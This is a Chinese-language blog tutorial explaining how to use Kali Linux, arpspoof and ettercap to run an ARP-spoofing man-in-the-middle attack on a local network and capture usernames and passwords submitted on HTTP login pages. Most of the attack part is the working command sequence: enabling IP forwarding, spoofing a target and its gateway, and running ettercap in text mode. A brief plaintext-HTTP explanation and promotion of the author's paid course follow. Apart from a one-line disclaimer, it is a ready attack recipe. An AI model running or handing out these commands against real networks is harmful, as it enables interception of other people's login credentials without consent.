kali是如何通过ettercap中间人攻击嗅探目标上网登录密码的?

【kali是如何通过ettercap中间人攻击嗅探目标上网登录密码的?】

近日,我一直在写关于局域网中间人攻击的小白教程,从最开始的ARP缓存攻击,实现截获局域网下任何电脑设备的上网记录;到DNS域名攻击,实现替换他人正常访问的网页,重定向到山寨的钓鱼网页;后面又讲了使用kali的ettercap中间人套件,实时截获目标浏览时的图片(以上课程仅用于安全为目的测试使用,禁止用于不当用途!),学员反映学后很有收获,甚至问我还能不能再讲解下关于网页HTTP/HTTPS的攻击,好的,首先在这里提前透露下吧,另外完整的中间人流量攻击教程,大家可以点击>>头条专栏获取。

kali既然集成了ettercap,再加上arpspoof,一般情况下几个命令就能搞定HTTP登录页面的用户名和密码的获取。

1、开启kali的路由转发

echo 1 > /proc/sys/net/ipv4/ip_forward

没有转发,就会出现拒绝服务器

2、开启ARP欺骗

arpspoof -i eth0(网卡) -t 192.168.31.6(目标IP) 192.168.31.1(网关)

将kali伪装成网关,并欺骗win10

3、ettercap命令行模式嗅探

ettercap -Tq -i eth0

-Tq是指文本模式,指输出嗅探到的url和用户名密码、IP!

理想的状态下,192.168.31.6这台win10靶机如果在HTTP类型的网页下登录时,ettercap就会自动截获登录时提交的用户名和密码。

原理:为什么HTTP类型网页中的登录密码可以被嗅探截获呢?首先你要明白HTTP协议下的网页,任何数据都是不被加密的,明文传输你提交到服务器的登录凭证,此时kali作为中间人嗅探到的当然是没有加密的登陆口令了!既然你明白了HTTP,那么HTTPS也就不再扑朔迷离,简单地说网页如果使用了HTTPS协议,那就是将这个网页上的数据传输做了加密,关于HTTPS下登录口令的获取,下节课再详谈!

更多数据流量的中间人攻击、以及完整的网络安全、白帽黑客技术,可以点击>>头条专栏>>前往我的视频教程《白帽黑客kali渗透实战指南》。

关注@小白嘿客 ,从新手小白到白帽黑客!

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注